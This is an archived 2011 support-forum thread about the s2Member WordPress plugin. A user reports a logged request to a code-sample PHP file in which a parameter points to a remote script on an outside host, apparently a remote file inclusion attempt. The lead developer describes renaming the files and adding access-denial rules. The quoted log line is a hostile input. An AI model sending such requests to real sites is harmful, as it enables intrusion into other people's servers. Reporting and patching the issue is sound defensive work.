PriMoThemes — now s2Member® (official notice)

This is now a very OLD forum system. It's in READ-ONLY mode.
All community interaction now occurs at WP Sharks™. See: new forums @ WP Sharks™

possible security problem

s2Member Plugin. A Membership plugin for WordPress®.

possible security problem

Postby coloradoflyfisherman » September 27th, 2011, 4:34 pm

9/27/11 today a hacker named genshop.org tried and succeeded in accessing this page

plugins/s2member/includes/menu-pages/code-samples/current-user-login.php?varname=http://genshop.org/script/prostoparanoia/ras HTTP/1.1" 200 397 getting a 200 return which is a successful access. If I did not have security software in operation, this hacker would have hacked me again.

I know there is not much code on the page accessed but what an obscure place to bury a hacker code to do a site name hijack and add pages to Google index.
User avatar
coloradoflyfisherman
Registered User
Registered User
 
Posts: 14
Joined: May 12, 2011

Re: possible security problem

Postby Cristián Lávaque » September 29th, 2011, 2:00 am

I'm letting Jason know about this just in case. Thanks for reporting it. :)
Cristián Lávaque http://s2member.net
Is s2Member working for you? Please rate it Image at WordPress.org. Thanks! :)
User avatar
Cristián Lávaque
Developer
Developer
 
Posts: 6836
Joined: December 22, 2010

Re: possible security problem

Postby Jason Caldwell » October 1st, 2011, 8:00 pm

Thanks for reporting this important issue.
~ I'm having this addressed in the next release.

* (s2Member) **Security fix**. It was possible for some of s2Member's code sample files to be executed directly. Not a proven vulnerability, but definitely NOT a good idea to allow this either. Fixed in this release, by renaming all `.php` files inside the `/includes/menu-pages/code-samples/` directory. These files now have a `.x-php` extension. As an additional line of defense, a new `.htaccess` file with `deny from all` is automatically placed inside the main `/s2member/includes/` directory. None of these files should be available pulicly anyway. s2Member's exsiting `realpath()` file scans remain in place too, which further prevents the direct execution of `.php` files.
~ Jason Caldwell / Lead Developer
& Zeitgeist Movie Advocate: http://www.zeitgeistmovie.com/

Is the s2Member plugin working for you? Please rate s2Member at WordPress.org.
You'll need a WordPress.org account ( comes in handy ). Then rate s2Member here Image
.
User avatar
Jason Caldwell
Lead Developer
Lead Developer
 
Posts: 4045
Joined: May 3, 2010
Location: Georgia / USA

Re: possible security problem

Postby Deyson » November 22nd, 2011, 2:22 pm

Can we have the name of the security program that was used to discover this?
User avatar
Deyson
Registered User
Registered User
 
Posts: 67
Joined: December 28, 2010


Return to s2Member Plugin

Who is online

Users browsing this forum: No registered users and 1 guest

cron